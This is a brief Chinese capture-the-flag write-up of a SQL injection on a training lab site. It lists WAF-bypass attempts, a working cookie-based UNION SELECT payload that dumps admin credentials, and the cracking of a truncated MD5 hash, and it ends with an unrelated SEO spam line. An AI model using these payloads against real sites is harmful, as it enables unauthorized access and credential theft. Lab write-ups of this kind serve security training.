初始页面:http://g8wepfcp.ia.aqlab.cn/

随机查看新闻动态,进入后的URL:http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=170

判断是否存在注入点:
http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=170'

被拦截了。
尝试and 1=1也被拦截。
尝试order by,爆出字段为10。
尝试注释绕过:http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=171'/*(s13*/,被拦截了。
尝试内联绕过:http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=171/*!40000'*/,被拦截了。
尝试双写绕过:http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=171'',被拦截了。
网页防护一般只拦截Get、post传参,尝试将测试语句放到cookie里面,再发送给服务器:

页面能正常显示,说明Cookie传参有效,被当作sql语句拼接了。
尝试通过Cookie注入:
cookie值:id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin【from admin的来源不清楚,相关资料直接给出,使用其他表的表名均会爆数据库错误】

爆出回显点有:2,3,7,8,9。
爆用户名和密码:admin/b9a2a2b5dffb918c
id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin
解码密码:b9a2a2b5dffb918c-->welcome【加密是MD5的16位截断】
进入后台http://g8wepfcp.ia.aqlab.cn/admin/【后台地址一般是在url后接/admin】
输入账号密码:admin/welcome。

登录成功后拿到Flag。

牡丹江市网站建设_网站建设公司_前后端分离_seo优化